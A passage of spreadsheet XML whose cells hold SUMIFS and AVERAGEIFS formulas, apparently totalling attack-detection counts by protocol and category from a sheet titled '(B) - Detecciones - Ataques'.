      <c r="EG40" s="279"/>
      <c r="EH40" s="271"/>
      <c r="EI40" s="358" t="s">
        <v>292</v>
      </c>
      <c r="EJ40" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S38 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EK40" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI40 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="EL40" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI40 &amp; "*")</f>
        <v>11</v>
      </c>
      <c r="EM40" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI40 &amp; "*")</f>
        <v>29</v>
      </c>
      <c r="EN40" s="360">
        <f t="shared" si="4"/>
        <v>29</v>
      </c>
      <c r="EO40" s="364"/>
      <c r="EP40" s="364"/>
      <c r="EQ40" s="364"/>
      <c r="ER40" s="271"/>
      <c r="ES40" s="271"/>
      <c r="ET40" s="271"/>
      <c r="EU40" s="271"/>
      <c r="EV40" s="379" t="s">
        <v>292</v>
      </c>
      <c r="EW40" s="389">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="EX40" s="389">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="EY40" s="389">
        <f t="shared" si="10"/>
        <v>5.5</v>
      </c>
      <c r="EZ40" s="390">
        <f t="shared" si="11"/>
        <v>14.5</v>
      </c>
      <c r="FA40" s="367"/>
      <c r="FC40" s="299"/>
      <c r="FD40" s="46"/>
      <c r="FE40" s="300" t="s">
        <v>6</v>
      </c>
      <c r="FF40" s="301" t="s">
        <v>7</v>
      </c>
      <c r="FG40" s="301" t="s">
        <v>8</v>
      </c>
      <c r="FH40" s="302" t="s">
        <v>9</v>
      </c>
      <c r="FK40" s="416" t="s">
        <v>2413</v>
      </c>
      <c r="FL40" s="417">
        <f t="shared" ref="FL40:FO40" si="25">SUM(FL25:FL39)</f>
        <v>46</v>
      </c>
      <c r="FM40" s="417">
        <f t="shared" si="25"/>
        <v>172</v>
      </c>
      <c r="FN40" s="417">
        <f t="shared" si="25"/>
        <v>271</v>
      </c>
      <c r="FO40" s="417">
        <f t="shared" si="25"/>
        <v>411</v>
      </c>
      <c r="FP40" s="392"/>
      <c r="FQ40" s="392"/>
      <c r="FR40" s="418"/>
      <c r="FS40" s="418"/>
      <c r="FT40" s="418"/>
      <c r="FU40" s="418"/>
      <c r="FV40" s="392"/>
      <c r="FW40" s="392"/>
      <c r="FX40" s="392"/>
      <c r="FY40" s="392"/>
      <c r="FZ40" s="392"/>
      <c r="GA40" s="392"/>
      <c r="GB40" s="392"/>
      <c r="GC40" s="392"/>
      <c r="GD40" s="392"/>
      <c r="GE40" s="392"/>
      <c r="GF40" s="392"/>
      <c r="GG40" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"UDP")</f>
        <v>UDP</v>
      </c>
      <c r="GH40" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GI40" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GJ40" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GK40" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"UDP")</f>
        <v>UDP</v>
      </c>
      <c r="GL40" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GM40" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GN40" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GO40" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"UDP")</f>
        <v>UDP</v>
      </c>
      <c r="GP40" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GQ40" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GR40" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GS40" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"UDP")</f>
        <v>UDP</v>
      </c>
      <c r="GT40" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GU40" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GV40" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG40)</f>
        <v>0</v>
      </c>
      <c r="GW40" s="392"/>
      <c r="GX40" s="392"/>
      <c r="GY40" s="392"/>
      <c r="GZ40" s="392"/>
      <c r="HA40" s="392"/>
      <c r="HB40" s="392"/>
      <c r="HC40" s="392"/>
      <c r="HD40" s="392"/>
      <c r="HE40" s="392"/>
      <c r="HF40" s="392"/>
      <c r="HG40" s="392"/>
      <c r="HH40" s="392"/>
      <c r="HI40" s="392"/>
      <c r="HJ40" s="392"/>
      <c r="HK40" s="392"/>
      <c r="HL40" s="392"/>
      <c r="HM40" s="392"/>
      <c r="HN40" s="392"/>
      <c r="HO40" s="392"/>
      <c r="HP40" s="392"/>
    </row>
    <row r="41">
      <c r="B41" s="277"/>
      <c r="C41" s="271"/>
      <c r="D41" s="271"/>
      <c r="E41" s="271"/>
      <c r="F41" s="271"/>
      <c r="G41" s="278"/>
      <c r="J41" s="277"/>
      <c r="K41" s="376"/>
      <c r="L41" s="377"/>
      <c r="M41" s="377"/>
      <c r="N41" s="378"/>
      <c r="O41" s="278"/>
      <c r="Q41" s="271"/>
      <c r="R41" s="386" t="s">
        <v>2484</v>
      </c>
      <c r="S41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="T41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>104</v>
      </c>
      <c r="V41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="W41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Z41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>569</v>
      </c>
      <c r="AA41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AB41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="AC41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>3</v>
      </c>
      <c r="AD41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE41" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AF41" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG41" s="271"/>
      <c r="AH41" s="386" t="s">
        <v>2484</v>
      </c>
      <c r="AI41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AJ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AK41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>104</v>
      </c>
      <c r="AL41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="AM41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AN41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AO41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>569</v>
      </c>
      <c r="AP41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AQ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="AR41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>3</v>
      </c>
      <c r="AS41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AT41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AU41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AV41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AG27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AG27 &amp; "*") </f>
        <v>1181</v>
      </c>
      <c r="AW41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AH27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AH27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AX41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AI27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AI27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AY41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AJ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AJ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AZ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AK27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AK27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BA41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AL27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AL27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BB41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AM27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AM27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BC41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AN27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AN27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BD41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AO27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AO27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BE41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AP27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AP27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BF41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AQ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AQ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BG41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AR27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AR27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BH41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AS27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AS27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BI41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AT27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AT27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BJ41" s="355">
